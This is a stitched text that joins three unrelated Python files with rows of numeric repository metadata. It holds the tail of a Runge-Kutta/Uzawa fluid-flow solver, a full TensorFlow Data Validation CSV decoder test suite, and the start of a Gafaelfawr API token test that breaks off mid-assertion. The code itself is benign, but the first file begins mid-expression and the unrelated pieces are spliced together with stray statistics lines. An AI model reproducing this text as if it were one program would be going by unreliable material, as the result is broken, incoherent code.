sd.mul_num_scalar(self.erk.B_coefs["b1"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.erk.B_coefs["b2"],
self.erk.make_rhs_ode_x(g_12, g_22)),
sd.mul_num_scalar(self.erk.B_coefs["b3"],
self.erk.make_rhs_ode_x(g_13, g_23)),
sd.mul_num_scalar(self.erk.B_coefs["b4"],
self.erk.make_rhs_ode_x(g_14, g_24)),
sd.mul_num_scalar(self.irk.A_coefs["a41"],
self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a42"],
self.irk.make_rhs_dae_x(g_12,
g_32, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a43"],
self.irk.make_rhs_dae_x(g_13,
g_33, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a44"],
self.irk.make_rhs_dae_x(g_14,
g_34, st_rhs_14))))))
g_2f = sd.add_scalars(
v_y,
self.velocity_inverse_mass.apply(
sd.mul_num_scalar(self.dt, sd.add_scalars(
sd.mul_num_scalar(self.erk.B_coefs["b1"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.erk.B_coefs["b2"],
self.erk.make_rhs_ode_y(g_12, g_22)),
sd.mul_num_scalar(self.erk.B_coefs["b3"],
self.erk.make_rhs_ode_y(g_13, g_23)),
sd.mul_num_scalar(self.erk.B_coefs["b4"],
self.erk.make_rhs_ode_y(g_14, g_24)),
sd.mul_num_scalar(self.irk.A_coefs["a41"],
self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a42"],
self.irk.make_rhs_dae_y(g_22,
g_32, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a43"],
self.irk.make_rhs_dae_y(g_23,
g_33, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a44"],
self.irk.make_rhs_dae_y(g_24,
g_34, st_rhs_24))))))
print("final stage done")
print("")
#v_x.sc, v_y.sc, p.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
v_x.sc, v_y.sc, p.sc = g_1f.sc.copy(), g_2f.sc.copy(), g_34.sc.copy()
# Do we need to recompute the right pressure?
# The pressure must be the right Lagrange multiplier of the
# resulting velocity
p.sc = self.solve(self.pressure_divgrad,
self.make_rhs_pressure_equation(v_x, v_y,
st_rhs_14, st_rhs_24), nsp).sc
else: #v_x, etc are trees
velocity_x = sd.Scalar(v_x)
velocity_y = sd.Scalar(v_y)
pressure = sd.Scalar(p)
if self.st_flag_vx: #we need to put the st_tree_vx to the same grading as v_x
op.set_to_same_grading(v_x, self.st_tree_vx)
op.run_pruning(self.st_tree_vx)
mesh.listing_of_leaves(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_12 = sd.Scalar(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_13 = sd.Scalar(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_14 = sd.Scalar(self.st_tree_vx)
if self.st_flag_vy: #we need to put the st_tree_vy to the same grading as v_y
op.set_to_same_grading(v_y, self.st_tree_vy)
op.run_pruning(self.st_tree_vy)
mesh.listing_of_leaves(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_22 = sd.Scalar(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_23 = sd.Scalar(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_24 = sd.Scalar(self.st_tree_vy)
if self.st_flag_vc: #we need to put the st_tree_vy to the same grading as v_y
op.set_to_same_grading(v_x, self.st_tree_vc)
op.run_pruning(self.st_tree_vc)
mesh.listing_of_leaves(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_32 = sd.Scalar(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_33 = sd.Scalar(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_34 = sd.Scalar(self.st_tree_vc)
g_11, g_21, g_31 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_11.sc, g_21.sc, g_31.sc = velocity_x.sc.copy(), \
velocity_y.sc.copy(), pressure.sc.copy()
print("stage 1 done")
print("")
g_12, g_22, g_32 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_12.sc, g_22.sc, g_32.sc = g_11.sc.copy(), g_21.sc.copy(), g_31.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
sd.mul_num_scalar(self.erk.A_coefs["a21"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_12)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
sd.mul_num_scalar(self.erk.A_coefs["a21"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_22)))
self.irk.uzawa_solver_internal("2", velocity_x=g_12, velocity_y=g_22,
pressure=g_32, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_32)
print("stage 2 done")
print("")
g_13, g_23, g_33 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_13.sc, g_23.sc, g_33.sc = g_12.sc.copy(), g_22.sc.copy(), g_32.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
sd.mul_num_scalar(self.erk.A_coefs["a31"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a32"],
self.erk.make_rhs_ode_x(g_12, g_22)),
sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_13)),
sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_x(g_12,
g_32, st_rhs_13)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
sd.mul_num_scalar(self.erk.A_coefs["a31"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a32"],
self.erk.make_rhs_ode_y(g_12, g_22)),
sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_23)),
sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_y(g_22,
g_32, st_rhs_23)))
self.irk.uzawa_solver_internal("3", velocity_x=g_13, velocity_y=g_23,
pressure=g_33, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_33)
print("stage 3 done")
print("")
g_14, g_24, g_34 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_14.sc, g_24.sc, g_34.sc = g_13.sc.copy(), g_23.sc.copy(), g_33.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
sd.mul_num_scalar(self.erk.A_coefs["a41"],
self.erk.make_rhs_ode_x(g_11, g_21, st_rhs_14)),
sd.mul_num_scalar(self.erk.A_coefs["a42"],
self.erk.make_rhs_ode_x(g_12, g_22, st_rhs_14)),
sd.mul_num_scalar(self.erk.A_coefs["a43"],
self.erk.make_rhs_ode_x(g_13, g_23, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
g_32, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
g_33, st_rhs_14)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
sd.mul_num_scalar(self.erk.A_coefs["a41"],
self.erk.make_rhs_ode_y(g_11, g_21, st_rhs_24)),
sd.mul_num_scalar(self.erk.A_coefs["a42"],
self.erk.make_rhs_ode_y(g_12, g_22, st_rhs_24)),
sd.mul_num_scalar(self.erk.A_coefs["a43"],
self.erk.make_rhs_ode_y(g_13, g_23, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
g_32, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
g_33, st_rhs_24)))
self.irk.uzawa_solver_internal("4", velocity_x=g_14, velocity_y=g_24,
pressure=g_34, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
print("stage 4 done")
print("")
velocity_x.sc, velocity_y.sc, pressure.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
# Do we need to recompute the right pressure?
self.scalar_to_tree(velocity_x, v_x)
self.scalar_to_tree(velocity_y, v_y)
self.scalar_to_tree(pressure, p)
| 51.373162 | 102 | 0.595305 | 4,439 | 27,947 | 3.377563 | 0.072088 | 0.055092 | 0.050157 | 0.087774 | 0.764757 | 0.754752 | 0.744014 | 0.737544 | 0.73501 | 0.733075 | 0 | 0.045013 | 0.29649 | 27,947 | 543 | 103 | 51.467772 | 0.717563 | 0.11189 | 0 | 0.73262 | 0 | 0 | 0.015212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010695 | false | 0 | 0.042781 | 0 | 0.05615 | 0.050802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13f0f90398b606401aa2aac66a4cd9e077d62b6e | 15,942 | py | Python | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | 1 | 2020-11-08T17:03:55.000Z | 2020-11-08T17:03:55.000Z | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | null | null | null | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for CSV decoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
from absl.testing import absltest
import apache_beam as beam
from apache_beam.testing import util
from tensorflow_data_validation.coders import csv_decoder
from tensorflow_data_validation.pyarrow_tf import pyarrow as pa
from tensorflow_data_validation.utils import test_util
from google.protobuf import text_format
from tensorflow_metadata.proto.v0 import schema_pb2
class CSVDecoderTest(absltest.TestCase):
"""Tests for CSV decoder."""
def test_csv_decoder(self):
input_lines = ['1,2.0,hello',
'5,12.34,world']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[2.0], [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], [b'world']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_schema(self):
input_lines = ['1,1,2.0,hello',
'5,5,12.34,world']
column_names = ['int_feature_parsed_as_float', 'int_feature',
'float_feature', 'str_feature']
schema = text_format.Parse(
"""
feature { name: "int_feature_parsed_as_float" type: FLOAT }
feature { name: "int_feature" type: INT }
feature { name: "float_feature" type: FLOAT }
feature { name: "str_feature" type: BYTES }
""", schema_pb2.Schema())
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.float32())),
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[2.0], [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], [b'world']], pa.list_(pa.binary())),
], ['int_feature_parsed_as_float', 'int_feature',
'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names, schema=schema,
infer_type_from_schema=True))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_missing_values(self):
input_lines = ['1,,hello',
',12.34,']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], None], pa.list_(pa.int64())),
pa.array([None, [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], None], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_int_and_float_in_same_column(self):
input_lines = ['2,1.5',
'1.5,2']
column_names = ['float_feature1', 'float_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[2.0], [1.5]], pa.list_(pa.float32())),
pa.array([[1.5], [2.0]], pa.list_(pa.float32())),
], ['float_feature1', 'float_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_int_and_string_in_same_column(self):
input_lines = ['2,abc',
'abc,2']
column_names = ['str_feature1', 'str_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'2'], [b'abc']], pa.list_(pa.binary())),
pa.array([[b'abc'], [b'2']], pa.list_(pa.binary())),
], ['str_feature1', 'str_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_float_and_string_in_same_column(self):
input_lines = ['2.3,abc',
'abc,2.3']
column_names = ['str_feature1', 'str_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'2.3'], [b'abc']], pa.list_(pa.binary())),
pa.array([[b'abc'], [b'2.3']], pa.list_(pa.binary())),
], ['str_feature1', 'str_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_unicode(self):
input_lines = [u'1,שקרכלשהו,22.34,text field']
column_names = ['int_feature', 'unicode_feature',
'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
pa.array([[22.34]], pa.list_(pa.float32())),
pa.array([[u'שקרכלשהו'.encode('utf-8')]], pa.list_(pa.binary())),
pa.array([[b'text field']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'unicode_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_csv_record_with_quotes(self):
input_lines = ['1,"ab,cd,ef"',
'5,"wx,xy,yz"']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'ab,cd,ef'], [b'wx,xy,yz']], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_space_delimiter(self):
input_lines = ['1 "ab,cd,ef"',
'5 "wx,xy,yz"']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'ab,cd,ef'], [b'wx,xy,yz']], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
delimiter=' '))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_tab_delimiter(self):
input_lines = ['1\t"this is a \ttext"',
'5\t']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'this is a \ttext'], None], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
delimiter='\t'))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_negative_values(self):
input_lines = ['-34', '45']
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[-34], [45]], pa.list_(pa.int64())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_int64_max(self):
input_lines = ['34', str(sys.maxsize)]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[34], [sys.maxsize]], pa.list_(pa.int64())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_pos(self):
input_lines = ['34', str(sys.maxsize+1)]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'34'], [str(sys.maxsize + 1).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_neg(self):
input_lines = ['34', str(-(sys.maxsize+2))]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'34'], [str(-(sys.maxsize + 2)).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_pos_and_neg(self):
input_lines = [str(sys.maxsize+1), str(-(sys.maxsize+2))]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[str(sys.maxsize + 1).encode('utf-8')],
[str(-(sys.maxsize + 2)).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_empty_row(self):
input_lines = [',,',
'1,2.0,hello']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
pa.array([None, [2.0]], pa.list_(pa.float32())),
pa.array([None, [b'hello']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_skip_blank_line(self):
input_lines = ['',
'1,2']
column_names = ['int_feature1', 'int_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
pa.array([[2]], pa.list_(pa.int64())),
], ['int_feature1', 'int_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_consider_blank_line(self):
input_lines = ['',
'1,2.0']
column_names = ['int_feature', 'float_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
pa.array([None, [2.0]], pa.list_(pa.float32())),
], ['int_feature', 'float_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
skip_blank_lines=False))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_skip_blank_line_single_column(self):
input_lines = ['',
'1']
column_names = ['int_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
], ['int_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_consider_blank_line_single_column(self):
input_lines = ['',
'1']
column_names = ['int_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
], ['int_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
skip_blank_lines=False))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_empty_csv(self):
input_lines = []
expected_result = []
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=[]))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_invalid_row(self):
input_lines = ['1,2.0,hello',
'5,12.34']
column_names = ['int_feature', 'float_feature', 'str_feature']
with self.assertRaisesRegexp(
ValueError, '.*Columns do not match specified csv headers.*'):
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, None))
if __name__ == '__main__':
absltest.main()
| 36.231818 | 79 | 0.5966 | 2,004 | 15,942 | 4.438623 | 0.0998 | 0.079146 | 0.035975 | 0.042046 | 0.809331 | 0.800112 | 0.794379 | 0.766161 | 0.756043 | 0.742215 | 0 | 0.019717 | 0.25875 | 15,942 | 439 | 80 | 36.314351 | 0.733012 | 0.038138 | 0 | 0.642857 | 0 | 0 | 0.094028 | 0.004977 | 0 | 0 | 0 | 0 | 0.063187 | 1 | 0.06044 | false | 0 | 0.032967 | 0 | 0.096154 | 0.002747 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b94192ecf775c96cd3fda0bebde6415b062befb9 | 31,986 | py | Python | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | null | null | null | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | 155 | 2020-05-29T17:21:13.000Z | 2022-03-28T19:55:52.000Z | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | 3 | 2021-04-26T18:02:58.000Z | 2022-02-03T01:29:13.000Z | """Tests for the ``/auth/api/v1/users/*/tokens`` and related routes."""
from __future__ import annotations
import time
from datetime import datetime, timedelta, timezone
from typing import TYPE_CHECKING
from unittest.mock import ANY
import pytest
from gafaelfawr.constants import COOKIE_NAME
from gafaelfawr.models.state import State
from gafaelfawr.models.token import Token, TokenGroup, TokenUserInfo
from gafaelfawr.util import current_datetime
from tests.support.constants import TEST_HOSTNAME
from tests.support.logging import parse_log
if TYPE_CHECKING:
from _pytest.logging import LogCaptureFixture
from tests.support.setup import SetupTest
@pytest.mark.asyncio
async def test_create_delete_modify(
setup: SetupTest, caplog: LogCaptureFixture
) -> None:
user_info = TokenUserInfo(
username="example",
name="Example Person",
email="example@example.com",
uid=45613,
groups=[TokenGroup(name="foo", id=12313)],
)
token_service = setup.factory.create_token_service()
session_token = await token_service.create_session_token(
user_info,
scopes=["read:all", "exec:admin", "user:token"],
ip_address="127.0.0.1",
)
csrf = await setup.login(session_token)
expires = current_datetime() + timedelta(days=100)
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": csrf},
json={
"token_name": "some token",
"scopes": ["read:all"],
"expires": int(expires.timestamp()),
},
)
assert r.status_code == 201
assert r.json() == {"token": ANY}
user_token = Token.from_str(r.json()["token"])
token_url = r.headers["Location"]
assert token_url == f"/auth/api/v1/users/example/tokens/{user_token.key}"
r = await setup.client.get(token_url)
assert r.status_code == 200
info = r.json()
assert info == {
"token": user_token.key,
"username": "example",
"token_name": "some token",
"token_type": "user",
"scopes": ["read:all"],
"created": ANY,
"expires": int(expires.timestamp()),
}
# Check that this is the same information as is returned by the token-info
# route. This is a bit tricky to do since the cookie will take precedence
# over the Authorization header, but we can't just delete the cookie since
# we'll lose the CSRF token. Save the cookie and delete it, and then
# later restore it.
cookie = setup.client.cookies.pop(COOKIE_NAME)
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {user_token}"},
)
assert r.status_code == 200
assert r.json() == info
setup.client.cookies.set(COOKIE_NAME, cookie, domain=TEST_HOSTNAME)
# Listing all tokens for this user should return the user token and a
# session token.
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 200
data = r.json()
# Adjust for sorting, which will be by creation date and then token.
assert len(data) == 2
if data[0] == info:
session_info = data[1]
else:
assert data[1] == info
session_info = data[0]
assert session_info == {
"token": session_token.key,
"username": "example",
"token_type": "session",
"scopes": ["exec:admin", "read:all", "user:token"],
"created": ANY,
"expires": ANY,
}
# Change the name, scope, and expiration of the token.
caplog.clear()
new_expires = current_datetime() + timedelta(days=200)
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={
"token_name": "happy token",
"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
},
)
assert r.status_code == 201
assert r.json() == {
"token": user_token.key,
"username": "example",
"token_name": "happy token",
"token_type": "user",
"scopes": ["exec:admin"],
"created": ANY,
"expires": int(new_expires.timestamp()),
}
# Check the logging. Regression test for a bug where new expirations
# would be logged as raw datetime objects instead of timestamps.
assert parse_log(caplog) == [
{
"expires": int(new_expires.timestamp()),
"event": "Modified token",
"key": user_token.key,
"level": "info",
"method": "PATCH",
"path": token_url,
"remote": "127.0.0.1",
"scope": "exec:admin read:all user:token",
"token": session_token.key,
"token_name": "happy token",
"token_scope": "exec:admin",
"token_source": "cookie",
"user": "example",
}
]
# Delete the token.
r = await setup.client.delete(token_url, headers={"X-CSRF-Token": csrf})
assert r.status_code == 204
r = await setup.client.get(token_url)
assert r.status_code == 404
# Deleting again should return 404.
r = await setup.client.delete(token_url, headers={"X-CSRF-Token": csrf})
assert r.status_code == 404
# This user should now have only one token.
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 200
assert len(r.json()) == 1
# We should be able to see the change history for the token.
r = await setup.client.get(token_url + "/change-history")
assert r.status_code == 200
assert r.json() == [
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "happy token",
